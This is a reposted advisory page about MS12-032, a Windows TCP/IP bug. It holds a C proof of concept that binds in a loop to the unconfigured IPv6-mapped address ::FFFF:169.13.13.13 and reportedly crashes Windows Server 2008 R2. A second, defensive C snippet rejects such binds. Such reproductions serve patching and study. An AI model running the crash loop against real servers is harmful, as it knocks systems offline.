MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
Source: Internet. Editor: 程序博客网. Time: 2024/05/17 21:54
Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032
Possible MS12-032 Proof of concept from StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in a Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to an IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on virtual machines.
From:
http://security-sh3ll.blogspot.com/2012/05/ms12-032-vulnerability-in-tcpip-could.html
```cpp
// The program attempts to bind to an IPv6-mapped IPv4 address
// in a tight loop. If the address is not configured on the machine,
// running the program crashes Windows Server 2008 R2 (if the program is 32-bit).
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>

#define IPV6_V6ONLY 27

void MyWsaStartup()
{
    WORD wVersionRequested;
    WSADATA wsaData;
    int err;

    wVersionRequested = MAKEWORD(2, 2);
    err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0) {
        printf("WSAStartup failed with error: %d\n", err);
        exit(-1);
    }
}

int main()
{
    MyWsaStartup();

    bool bindSuccess = false;
    while (!bindSuccess)
    {
        SOCKET sock = WSASocket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP,
                                NULL, 0, WSA_FLAG_OVERLAPPED);
        if (sock == INVALID_SOCKET)
        {
            printf("WSASocket failed\n");
            exit(-1);
        }

        // Clear IPV6_V6ONLY so the socket is dual-stack
        DWORD val = 0;
        if (setsockopt(sock, IPPROTO_IPV6, IPV6_V6ONLY,
                       (const char*)&val, sizeof(val)) != 0)
        {
            printf("setsockopt failed\n");
            closesocket(sock);
            exit(-1);
        }

        sockaddr_in6 sockAddr;
        memset(&sockAddr, 0, sizeof(sockAddr));
        sockAddr.sin6_family = AF_INET6;
        sockAddr.sin6_port = htons(5060);

        // set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
        // that is [::FFFF:169.13.13.13]
        sockAddr.sin6_addr.u.Byte[15] = 13;
        sockAddr.sin6_addr.u.Byte[14] = 13;
        sockAddr.sin6_addr.u.Byte[13] = 13;
        sockAddr.sin6_addr.u.Byte[12] = 169;
        sockAddr.sin6_addr.u.Byte[11] = 0xFF;
        sockAddr.sin6_addr.u.Byte[10] = 0xFF;

        int size = 28; // 28 is sizeof(sockaddr_in6)
        int nRet = bind(sock, (sockaddr*)&sockAddr, size);
        if (nRet == SOCKET_ERROR)
        {
            closesocket(sock);
            Sleep(100);
        }
        else
        {
            bindSuccess = true;
            printf("bind succeeded\n");
            closesocket(sock);
        }
    }
    return 0;
}
```
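An application-side guard for the condition the sample triggers, as an added example that is not part of the original post or of Microsoft's update: it decodes the IPv4-mapped layout the sample fills in by hand (bytes 10-11 set to 0xFF, bytes 12-15 holding the IPv4 address) and refuses the bind when the embedded IPv4 address is not in a caller-supplied list of configured addresses. The function names and the constructed address list (192.0.2.10, 127.0.0.1) are assumptions, and the code is plain portable C with no Winsock dependency.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Build ::FFFF:a.b.c.d in a 16-byte IPv6 address buffer. */
void make_v4mapped(uint8_t out[16], uint8_t a, uint8_t b, uint8_t c, uint8_t d)
{
    memset(out, 0, 16);
    out[10] = 0xFF; out[11] = 0xFF;
    out[12] = a; out[13] = b; out[14] = c; out[15] = d;
}

/* Return 1 and copy the embedded IPv4 address into v4 when addr is
 * IPv4-mapped (bytes 0-9 zero, bytes 10-11 0xFF); return 0 otherwise. */
int v4mapped_extract(const uint8_t addr[16], uint8_t v4[4])
{
    static const uint8_t prefix[12] = {0,0,0,0,0,0,0,0,0,0,0xFF,0xFF};
    if (memcmp(addr, prefix, sizeof(prefix)) != 0)
        return 0;
    memcpy(v4, addr + 12, 4);
    return 1;
}

/* Pre-bind check. local_v4 holds count IPv4 addresses, 4 bytes each, that
 * the caller knows are configured on this host (assumed input).
 * Native IPv6 addresses are outside this guard's scope and pass through. */
int bind_addr_allowed(const uint8_t addr[16], const uint8_t *local_v4, size_t count)
{
    uint8_t v4[4];
    if (!v4mapped_extract(addr, v4))
        return 1;
    for (size_t i = 0; i < count; i++)
        if (memcmp(v4, local_v4 + 4 * i, 4) == 0)
            return 1;
    return 0; /* mapped address not configured locally: do not call bind() */
}

int main(void)
{
    /* Constructed list of configured addresses: 192.0.2.10 and 127.0.0.1 */
    static const uint8_t local[] = {192, 0, 2, 10, 127, 0, 0, 1};
    uint8_t addr[16];

    make_v4mapped(addr, 169, 13, 13, 13); /* the address used in the sample */
    printf("::FFFF:169.13.13.13 allowed: %d\n", bind_addr_allowed(addr, local, 2));
    make_v4mapped(addr, 127, 0, 0, 1);
    printf("::FFFF:127.0.0.1 allowed: %d\n", bind_addr_allowed(addr, local, 2));
    return 0;
}
```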